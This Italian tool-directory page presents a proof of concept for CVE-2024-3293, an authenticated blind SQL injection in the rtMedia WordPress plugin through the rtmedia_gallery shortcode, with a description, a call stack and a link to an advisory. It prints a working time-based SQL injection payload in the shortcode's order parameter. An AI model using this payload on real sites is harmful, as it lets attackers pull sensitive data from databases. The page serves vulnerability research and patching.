Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-3293-Poc — CVE-2024-3293 rtMedia per WordPress, BuddyPress e bbPress <= 4.6.18 - SQL Injection autenticata (Collaboratore+) tramite shortcode rtmedia_gallery | Kitploit
Strumenti/GitHubGitHub/truonghuuphuc/cve-2024-3293-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubtruonghuuphuc/cve-2024-3293-poc

CVE-2024-3293-Poc

CVE-2024-3293 rtMedia per WordPress, BuddyPress e bbPress <= 4.6.18 - SQL Injection autenticata (Collaboratore+) tramite shortcode rtmedia_gallery

Vedi Repository
112 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-3293-Poc

rtMedia for WordPress, BuddyPress and bbPress <= 4.6.18 - SQL Injection autenticata (Contributor+) tramite lo shortcode rtmedia_gallery

Descrizione

Il plugin rtMedia for WordPress, BuddyPress and bbPress per WordPress è vulnerabile a SQL Injection cieca tramite lo shortcode rtmedia_gallery in tutte le versioni fino alla 4.6.18 inclusa, a causa di un escaping insufficiente sul parametro fornito dall'utente e della mancanza di una preparazione adeguata della query SQL esistente. Ciò consente a utenti autenticati, con accesso di livello contributor o superiore, di aggiungere query SQL aggiuntive alle query già esistenti che possono essere utilizzate per estrarre informazioni sensibili dal database.

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/buddypress-media/rtmedia-for-wordpress-buddypress-and-bbpress-4618-authenticated-contributor-sql-injection-via-rtmedia-gallery-shortcode

CALL STACK

RTMediaModel->get (\buddypress-media\app\helper\RTMediaModel.php:61)
RTMediaModel->get_media (\buddypress-media\app\helper\RTMediaModel.php:227)
RTMediaQuery->populate_media (\buddypress-media\app\main\routers\query\RTMediaQuery.php:869)
RTMediaQuery->populate_data (\buddypress-media\app\main\routers\query\RTMediaQuery.php:993)
RTMediaQuery->get_data (\buddypress-media\app\main\routers\query\RTMediaQuery.php:1214)
RTMediaQuery->query (\buddypress-media\app\main\routers\query\RTMediaQuery.php:684)
RTMediaQuery->__construct (\buddypress-media\app\main\routers\query\RTMediaQuery.php:184)
RTMediaGalleryShortcode::render (\buddypress-media\app\main\controllers\shortcodes\RTMediaGalleryShortcode.php:271)

Payload:

[rtmedia_gallery global="true" album_id="57" order_by="ratings" order=",media_id,(select 1 from (select sleep(IF(1=1,5,0)))x)"]

immagine

immagine

Payload vero:

immagine

Payload falso:

immagine

Scarica lo strumento